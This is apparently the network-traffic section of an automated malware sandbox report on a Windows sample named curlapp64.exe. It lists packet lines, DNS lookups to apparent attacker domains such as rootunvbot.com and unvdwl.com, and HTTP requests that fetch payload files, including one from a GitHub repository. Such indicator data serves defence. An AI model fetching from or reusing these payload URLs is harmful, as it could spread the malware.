                                                                                                                                                                                                Nov 5, 2024 10:46:24.992990971 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993029118 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993144989 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993160963 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993211031 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993216991 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993240118 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993269920 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993313074 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993326902 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993381023 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993387938 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993436098 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993580103 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993616104 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993643045 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993648052 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993669033 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993681908 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993689060 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993705034 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993750095 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993755102 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993799925 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993850946 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993868113 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993911028 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993916988 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.993962049 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.994080067 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.994093895 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.994148016 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:24.994159937 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:24.994204998 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000103951 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000158072 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000199080 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000205994 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000228882 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000437021 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000452995 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000497103 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000504971 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000531912 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000790119 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000804901 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000865936 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000866890 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000895023 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.000950098 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001427889 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001471996 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001527071 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001533985 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001579046 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001665115 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001683950 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001724958 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001730919 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001755953 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001775980 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.001982927 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002002001 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002053022 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002063036 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002074957 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002089977 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002114058 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002145052 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002151966 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002162933 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.002194881 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.003034115 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.003051996 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.003142118 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.003149986 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.003190041 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.026966095 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027000904 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027057886 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027065992 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027076960 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027132034 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027153015 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027182102 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027189016 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027215958 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027236938 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027592897 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027607918 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027683020 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027690887 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.027740002 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028316975 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028337002 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028374910 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028382063 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028393030 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028429985 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028667927 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028682947 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028734922 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028742075 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.028785944 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029311895 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029345989 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029376984 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029382944 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029412985 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029424906 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029439926 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029462099 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029486895 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029494047 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029516935 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.029536963 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098170042 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098217010 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098288059 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098301888 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098344088 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098762035 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098798037 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098831892 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098838091 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098846912 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.098901987 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099164009 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099212885 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099221945 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099229097 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099265099 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099266052 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099277020 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099304914 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099333048 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099339962 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099349022 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099863052 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099878073 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099926949 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099936008 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099957943 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.099983931 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100253105 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100298882 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100326061 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100332022 CET44352634185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100361109 CET52634443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:25.100375891 CET52634443192.168.2.5185.199.110.133

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 5, 2024 10:45:59.977497101 CET192.168.2.51.1.1.10xe5eeStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:08.032305956 CET192.168.2.51.1.1.10x2256Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:54.229756117 CET192.168.2.51.1.1.10xf2f1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:08.049427986 CET192.168.2.51.1.1.10x68c5Standard query (0)rootunvbot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:11.247790098 CET192.168.2.51.1.1.10xefa4Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:17.736773968 CET192.168.2.51.1.1.10xfe31Standard query (0)unvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:29.459837914 CET192.168.2.51.1.1.10x5412Standard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:37.077809095 CET192.168.2.51.1.1.10xf4c6Standard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:42.130495071 CET192.168.2.51.1.1.10xab7cStandard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:53.606333017 CET192.168.2.51.1.1.10x5fd0Standard query (0)github.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 5, 2024 10:45:59.994549036 CET1.1.1.1192.168.2.50xe5eeNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:08.039458990 CET1.1.1.1192.168.2.50x2256No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:08.039458990 CET1.1.1.1192.168.2.50x2256No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:08.039458990 CET1.1.1.1192.168.2.50x2256No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:08.039458990 CET1.1.1.1192.168.2.50x2256No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:46:54.238169909 CET1.1.1.1192.168.2.50xf2f1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:08.083929062 CET1.1.1.1192.168.2.50x68c5No error (0)rootunvbot.com188.116.21.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:11.254635096 CET1.1.1.1192.168.2.50xefa4No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:17.762290001 CET1.1.1.1192.168.2.50xfe31No error (0)unvdwl.com194.26.192.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:29.663682938 CET1.1.1.1192.168.2.50x5412No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:29.663682938 CET1.1.1.1192.168.2.50x5412No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 5, 2024 10:47:53.613214016 CET1.1.1.1192.168.2.50x5fd0No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.552918194.26.192.52801856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 5, 2024 10:47:17.770688057 CET70OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                                                Host: unvdwl.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Nov 5, 2024 10:47:18.594944954 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:47:18 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.552921194.26.192.52801856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 5, 2024 10:47:23.615185976 CET70OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                                                Host: unvdwl.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Nov 5, 2024 10:47:24.453764915 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:47:24 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.552928194.26.192.52801856C:\Windows\System32\svchost.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 5, 2024 10:47:36.237500906 CET73OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                                                Host: 194.26.192.52
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Nov 5, 2024 10:47:37.075406075 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:47:36 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.549712140.82.121.44435680C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:07 UTC89OUTHEAD /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:08 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:08 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.549715185.199.110.1334435680C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:08 UTC100OUTHEAD /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:09 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:09 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-kdal2120128-DFW
                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799969.717574,VS0,VE392
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: c8e02bb95113cdfb13bdf419a30a16938fb1f6a0
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:09 GMT
                                                                                                                                                                                                Source-Age: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.549716140.82.121.44435680C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:10 UTC88OUTGET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:10 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:10 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
